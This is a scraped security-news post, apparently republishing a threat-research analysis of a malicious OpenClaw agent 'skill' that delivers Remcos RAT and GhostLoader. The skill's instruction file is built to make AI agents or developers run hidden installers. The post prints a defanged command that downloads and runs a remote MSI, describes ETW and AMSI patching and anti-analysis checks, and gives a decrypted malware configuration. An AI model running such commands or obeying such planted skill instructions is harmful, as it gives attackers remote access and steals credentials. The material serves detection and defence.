{"id":211614,"date":"2026-05-10T05:15:00","date_gmt":"2026-05-10T09:15:00","guid":{"rendered":"https:\/\/testing.news-you-need.com\/index.php\/2026\/05\/10\/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader\/"},"modified":"2026-05-10T09:30:07","modified_gmt":"2026-05-10T13:30:07","slug":"malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader","status":"publish","type":"post","link":"https:\/\/testing.news-you-need.com\/index.php\/2026\/05\/10\/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader\/","title":{"rendered":"Malicious OpenClaw Skill Distributes Remcos RAT and GhostLoader"},"content":{"rendered":"

Malicious OpenClaw Skill Distributes Remcos RAT and GhostLoader<\/a><\/p>\n

https:\/\/www.cybersecurity-insiders.com\/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader\/<\/a><\/p>\n

Publish Date: 2026-05-10 05:15:00<\/a><\/p>\n

Source Domain: www.cybersecurity-insiders.com<\/a><\/p>\n

Author: <\/a><\/p>\n

Using an unordered list, summarize the following article with between 4 and 8 key points. <\/p>\n

OpenClaw, previously known as Clawdbot, Moltbot, and Molty, is an open-source framework designed for autonomous AI agents that execute complex tasks requiring high-privilege local system access. While intended for automation, its modular \u201cskill\u201d architecture has been weaponized as a significant attack vector.
\nIn March 2026, Zscaler ThreatLabz identified a campaign leveraging the framework to exploit the growing adoption of agentic AI workflows. The threat actor published a deceptive \u201cDeepSeek-Claw\u201d skill for the OpenClaw framework, embedding installation instructions designed to trick AI agents or unsuspecting developers into executing hidden malicious payloads under the guise of seemingly legitimate installation and configuration steps.\u00a0
\nIn this blog post, ThreatLabz examines how threat actors exploited the OpenClaw framework\u2019s \u201cskill\u201d architecture, abused trusted binaries for execution, and deployed both the Remcos remote access trojan (RAT) and GhostLoader, a cross-platform information stealer, to enable persistent system access and data theft.
\nKey Takeaways<\/p>\n

In March 2026, ThreatLabz identified an attack chain that exploits AI agentic workflows by leveraging a deceptive OpenClaw framework skill to deliver payloads through manipulated installation instructions.
\nThe attack downloads and runs a remote Windows Installer (MSI) package that installs Remcos RAT. The attack manipulates autonomous AI agents into parsing the OpenClaw skill to silently execute the installer, bypassing traditional user interaction requirements.
\nA legitimate, digitally signed GoToMeeting executable is abused to sideload a shellcode loader, helping the execution blend in with trusted processes and evade signature-based defenses.
\nThe in-memory loader dynamically patches Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI), and utilizes the Tiny Encryption Algorithm (TEA) in CBC mode to decrypt and execute the final Remcos RAT payload for remote access.
\nAn alternate execution path for macOS and Linux contains a heavily obfuscated Node.js payload that installs GhostLoader to harvest sensitive data from developer environments.<\/p>\n

Technical Analysis
\nThe following sections analyze the malicious OpenClaw skill and its role in orchestrating multiple infection chains. In this campaign, the OpenClaw skill functions as the initial access and execution vector, with embedded installation instructions that may be executed autonomously by AI agents or manually by users.
\nThe attack chain below illustrates how a malicious OpenClaw skill branches into two distinct infection paths, delivering either Remcos RAT or GhostLoader depending on the execution method and environment.\u00a0
\nFigure 1: Example attack chain showing how a malicious OpenClaw skill results in different malware execution paths.\u00a0\u00a0
\nThe attack chain begins when a developer downloads (or clones) the \u201cDeepSeek-Claw\u201d skill believing it to be a legitimate OpenClaw integration for DeepSeek. In SKILL.md, the instruction file included with the repository, the threat actor presents multiple execution paths. On Windows, a PowerShell one-liner downloads and executes a remote MSI installer that deploys Remcos RAT. The manual (cross-platform) instructions instead deliver GhostLoader via a separate installation method.
\nThe content of the SKILL.md file is shown in the figure below.\u00a0
\nFigure 2: OpenClaw skill markup file content showing commands that install Remcos RAT.
\nRemcos RAT
\nThe Remcos RAT chain is initiated if the following automated command is executed on Windows (either by an AI agent or a user).
\npowershell
\ncmd \/c start msiexec \/q \/i hxxps:\/\/cloudcraftshub[.]com\/api & rem DeepSeek Claw
\nThe downloaded MSI package contains two files:<\/p>\n

G2M.exe: A legitimate, digitally signed GoToMeeting executable from LogMeIn, Inc.
\ng2m.dll: A malicious DLL file that is sideloaded through GoToMeeting.<\/p>\n

By placing the malicious DLL in the application directory, the threat actor exploits DLL search order hijacking. When G2M.exe attempts to load the legitimate g2m.dll dependency, it instead loads the threat actor\u2019s malicious g2m.dll.
\nIn-memory shellcode loader
\nThe g2m.dll functions as a shellcode loader used for loading Remcos RAT while performing anti-analysis and environment checks, such as dynamic API resolution, XOR-based string decryption, and TEA payload obfuscation.\u00a0
\nAnti-analysis and evasion\u00a0
\nThe shellcode loader is built with several layers of protection designed to avoid detection and analysis, which are described in the following sections.\u00a0
\nTelemetry suppression (EDR blinding)<\/p>\n

ETW patching: Locates ntdll!EtwEventWrite and overwrites the prologue with a ret 14h instruction, silencing event logs for process and thread activity.
\nAMSI bypass: Patches amsi!AmsiScanBuffer to return AMSI_RESULT_CLEAN (0), ensuring the decrypted payload bypasses local memory scanners.<\/p>\n

The code sample below shows the malware disabling Windows security telemetry by patching EtwEventWrite in memory so it immediately returns, preventing ETW events from being logged.
\nAnti-debugging<\/p>\n

PEB check: Queries the BeingDebugged and NtGlobalFlag fields in the Process Environment Block (PEB) to detect attached debuggers and heap analysis tools.
\nTemporal latency (sandbox time-acceleration): Measures the execution time of a Sleep(100) call. Automated sandboxes often accelerate sleep calls; if the elapsed time is less than ~90 milliseconds, the loader aborts.
\nTemporal latency (attached debugger): Measures the execution time of a benign API call (RegOpenKeyExA). Calls exceeding 21 milliseconds may indicate the presence of hardware \/ software breakpoints or hypervisor emulation.
\nIn-memory software breakpoint scanning: Iterates through its own executable memory pages, scanning byte-by-byte for 0xCC (the INT 3 opcode) to detect if an analyst has placed software breakpoints in the process space.<\/p>\n

Anti-analysis & anti-virtualization
\nTo evade analysis environments, the loader dynamically XOR-decrypts a blocklist of analysis tools and virtual machine artifacts. It utilizes CreateToolhelp32Snapshot to hunt for specific running processes (e.g., ida.exe, ida64.exe, ollydbg.exe, x64dbg.exe, procmon.exe, procexp.exe, processhacker.exe, sysmon.exe, wireshark.exe, fiddler.exe, and vmtoolsd.exe) and calls OpenMutexA to check for known virtualization and sandbox-related mutexes (VMware, VBoxTrayIPC, and Sandboxie_SingleInstanceMutex). If any of these process names or mutexes are present on the host system, the malware immediately terminates execution.
\nPayload execution
\nThe core task of g2m.dll is to load and execute a Remcos RAT payload. The encrypted payload resides in the DLL\u2019s data section and is decrypted using the TEA algorithm in CBC mode with a 128-bit key before execution. To evade static analysis, the loader heavily relies on dynamic API resolution by manually parsing the PEB to locate standard Windows APIs. Each API name that is resolved by the loader is XOR-decrypted at runtime.
\nData exfiltration
\nOnce executed, Remcos RAT establishes a TLS-encrypted command-and-control (C2) channel over TCP and enables its configured stealth mode. It then begins monitoring the host by logging keystrokes, capturing clipboard data, and stealing browser session cookies from local SQLite databases to help bypass multifactor authentication (MFA). The ongoing connection gives the threat actor an interactive reverse shell that allows them to run arbitrary commands.
\nConfiguration details
\nRemcos stores its settings in a resource named SETTINGS (Type: RT_RCDATA). The configuration is encrypted using RC4. The first byte of the resource indicates the RC4 key length (11 bytes in this sample), followed by the key itself. An example of the decrypted Remcos configuration is shown below:
\n___________________________________________________________________
\n{
\n\u00a0 \u00a0\u201canti_analysis\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201canti_analysis_reaction\u201d: \u201cSelf Close\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdetect_debuggers\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdetect_process_explorer\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdetect_process_monitor\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdetect_sandboxie\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdetect_virtualbox\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdetect_vmware\u201d: false
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201caudio\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201ccapture_minutes\u201d: 5,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cenabled\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfolder\u201d: \u201cMicRecords\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cparent_folder\u201d: \u201cAPP_PATH\u201d
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201cbotnet_id\u201d: \u201cRemoteHost\u201d,
\n\u00a0 \u00a0\u201cca_certificate\u201d: \u201c\u2014\u2013BEGIN CERTIFICATE\u2014\u2013nMIH+MIGmoAMCAQICEDrTamWqxpD2aKpujtqbyCIwCgYIKoZIzj0EAwIwADAiGA8xnOTcwMDEwMTAwMDAwMFoYDzIwOTAxMjMxMDAwMDAwWjAAMFkwEwYHKoZIzj0CAQYInKoZIzj0DAQcDQgAEHQwYjvDdIGMjUo\/kFdiq+RDQzintS11+NVrnxbcTNGmBQ6Fvnxgqp3KtvNPR5ZscfQlEtWAwY7VFB5V12NC630jAKBggqhkjOPQQDAgNHADBEAiA9n+2Ikc5ohWNcm8LI1ZLIItDYXMjw8UzGNPdQCT3weygIgXSu4fQWMOe8X7PD+FiEmnhCgRPMX1Z8AwtPkZnFsafuM=n\u2014\u2013END CERTIFICATE\u2014\u2013n\u201d,
\n\u00a0 \u00a0\u201cclient_certificate\u201d: \u201c\u2014\u2013BEGIN CERTIFICATE\u2014\u2013nMIH\/MIGmoAMCAQICEFrmTv5bO9pg2q+Wk1aF2zcwCgYIKoZIzj0EAwIwADAiGA8xnOTcwMDEwMTAwMDAwMFoYDzIwOTAxMjMxMDAwMDAwWjAAMFkwEwYHKoZIzj0CAQYInKoZIzj0DAQcDQgAEg7G4k+C\/NYlSD3xKVfoaMAcp11mbR+3VQtYHObPELM7znr5dn4vvCasJlnE1gk5H4CQrDjuTZLcjRhG\/g23oB2zAKBggqhkjOPQQDAgNIADBFAiEAnzjAeJJeCG+xXC0qz92XrVavxa\/7mx8gsSPMWwJqvwJsCIA1Txe+F1i6pA08KnbwmnUSnQ5tj5A\/Nhe0px9qw7\/xd2n\u2014\u2013END CERTIFICATE\u2014\u2013n\u201d,
\n\u00a0 \u00a0\u201cconnection_delay\u201d: 0,
\n\u00a0 \u00a0\u201cconnection_interval\u201d: 1,
\n\u00a0 \u00a0\u201ccookies\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cclear\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cclear_after_mins\u201d: 0,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201conly_on_first_launch\u201d: true
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201ccrypto_keys\u201d: [
\n\u00a0 \u00a0 \u00a0 \u00a0{
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201ckey\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201ccurve\u201d: \u201cNIST P-256\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201cd\u201d: 103467726273079568827984897272771914754698456464876609290600459562275374008049,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201cinput_format\u201d: \u201cDER\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201cmode\u201d: \u201cPRIVATE\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201cx\u201d: 59566989002982252644182944703717841268486342387271460459249385289095458335950,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201cy\u201d: 110192497904953793095106844023521210066121004526122577549384281283014881313243
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0},
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201ckey_name\u201d: \u201ccertificate_key\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201ckey_relation\u201d: \u201ccommunication\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201ckey_type\u201d: \u201cECC\u201d
\n\u00a0 \u00a0 \u00a0 \u00a0}
\n\u00a0 \u00a0],
\n\u00a0 \u00a0\u201cfiles_and_processes_protection_watchdog\u201d: false,
\n\u00a0 \u00a0\u201cinject_process\u201d: \u201cno injection\u201d,
\n\u00a0 \u00a0\u201cinstallation_settings\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cauto_elevation\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cautorun_regkey_name\u201d: \u201c\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cdisable_uac\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfilename\u201d: \u201cremcos.exe\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfolder\u201d: \u201cRemcos\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201chide_persistence\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cinstall\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cparent_folder\u201d: \u201cPROGRAM_DATA\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cremove_itself\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cstartup_method\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201chkcu_run_regkey\u201d: true,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201chklm_explorer_run_regkey\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201chklm_run_regkey\u201d: true,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201chklm_winlogon_shell_regkey\u201d: true,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201chklm_winlogon_userinit_regkey\u201d: \u201c\u201d
\n\u00a0 \u00a0 \u00a0 \u00a0}
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201ckeylogger\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cenabled\u201d: true,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfilter_keyword_list\u201d: []
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201clicence_key\u201d: \u201c82536825E700F4C863238A90DD314687\u201d,
\n\u00a0 \u00a0\u201clog_file\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cencrypt\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfilename\u201d: \u201clogs.dat\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfolder\u201d: \u201cremcos\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201chide\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cparent_folder\u201d: \u201cPROGRAM_DATA\u201d
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201cmutex\u201d: \u201cRmc-11YWBZ\u201d,
\n\u00a0 \u00a0\u201cregistry_protection_watchdog\u201d: false,
\n\u00a0 \u00a0\u201cscreenlogger\u201d: {
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cenable_window_filtering\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cenabled\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cencrypt\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfilter_keyword_list\u201d: [],
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cfolder\u201d: \u201cScreenshots\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cinclude_cursor\u201d: false,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cparent_folder\u201d: \u201cAPP_DATA\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201ctrigger_minutes\u201d: 10,
\n\u00a0 \u00a0 \u00a0 \u00a0\u201cwindow_filtering_trigger_seconds\u201d: 5
\n\u00a0 \u00a0},
\n\u00a0 \u00a0\u201cstealth_mode\u201d: \u201cinvisible\u201d,
\n\u00a0 \u00a0\u201curls\u201d: [
\n\u00a0 \u00a0 \u00a0 \u00a0{
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201curl\u201d: \u201ctcp+tls:\/\/146[.]19.24[.]131:2404\/\u201d,
\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\u201curl_type\u201d: \u201ccnc\u201d
\n\u00a0 \u00a0 \u00a0 \u00a0}
\n\u00a0 \u00a0]
\n}\u00a0
\n___________________________________________________________________
\nGhostLoader
\nGhostLoader, also known as GhostClaw, is a cross-platform information stealer that targets developer environments by exploiting trusted development workflows to carry out data exfiltration. Because similar campaigns have already been documented by other vendors, our analysis here is intentionally brief.
\nIn this campaign, if an AI agent or user executes the alternative manual installation instructions (e.g, install.sh or npm install), the GhostLoader attack chain is triggered across macOS, Linux, or manual Windows workflows. The second portion of the SKILL.md file is shown in the figure below.\u00a0
\nFigure 3: OpenClaw skill markup file content showing commands that install GhostLoader.
\nExecution\u00a0
\nIn Windows, GhostLoader is delivered via a heavily obfuscated Node.js payload (setup.js) embedded in the project\u2019s npm lifecycle scripts. The process is initiated by Bash-based installers, which trigger the npm scripts and execute the hidden payload.
\nCredential harvesting
\nOn macOS and Linux systems, this script acts as a sophisticated dropper that uses terminal-based social engineering, such as spoofed sudo password prompts, to trick users into handing over credentials as shown below.\u00a0
\nData exfiltration
\nOnce executed, GhostLoader collects additional sensitive data from the host, including macOS keychain information, SSH keys, cryptocurrency wallets, and cloud-based API tokens, which is sent to a threat actor-controlled server.\u00a0
\nConclusion
\nThis campaign highlights a growing trend of threat actors weaponizing emerging AI workflows. By disguising malware as an OpenClaw \u201cDeepSeek\u201d skill, the threat actor leveraged classic DLL sideloading to deploy Remcos RAT as well as Node.js to deploy GhostLoader for data theft. As AI agents become standard enterprise tools, organizations must thoroughly check third-party plugins and maintain strict behavioral monitoring of third-party skills to stop these evolving attack chains.
\nZscaler Coverage
\nZscaler\u2019s multilayered cloud security platform detects indicators related to this threat at various levels. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for the MSI file discussed in this blog.
\nFigure 4: Zscaler Cloud Sandbox report for the MSI file.
\nIn addition to sandbox detections, Zscaler\u2019s multilayered cloud security platform detects indicators related to the campaign at various levels with the following threat names:<\/p>\n

Indicators Of Compromise (IOCs)<\/p>\n

\u00a0
\nMITRE ATT&CK Framework<\/p>\n

Join our LinkedIn group Information Security Community!<\/p>\n

<\/p>\n","protected":false},"excerpt":{"rendered":"

Malicious OpenClaw Skill Distributes Remcos RAT and GhostLoader https:\/\/www.cybersecurity-insiders.com\/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader\/ Publish Date: 2026-05-10 05:15:00 Source Domain:…<\/p>\n","protected":false},"author":1,"featured_media":211616,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/www.cybersecurity-insiders.com\/wp-content\/uploads\/CSI-Malicious-OpenClaw-Skill.png","fifu_image_alt":"","footnotes":""},"categories":[15],"tags":[26,24,31,32,34],"class_list":["post-211614","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-ai","tag-cybersecurity","tag-exploit","tag-malware","tag-threat-actor"],"_links":{"self":[{"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/211614"}],"collection":[{"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=211614"}],"version-history":[{"count":1,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/211614\/revisions"}],"predecessor-version":[{"id":211618,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/211614\/revisions\/211618"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/211616"}],"wp:attachment":[{"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/media?parent=211614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=211614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/testing.news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=211614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}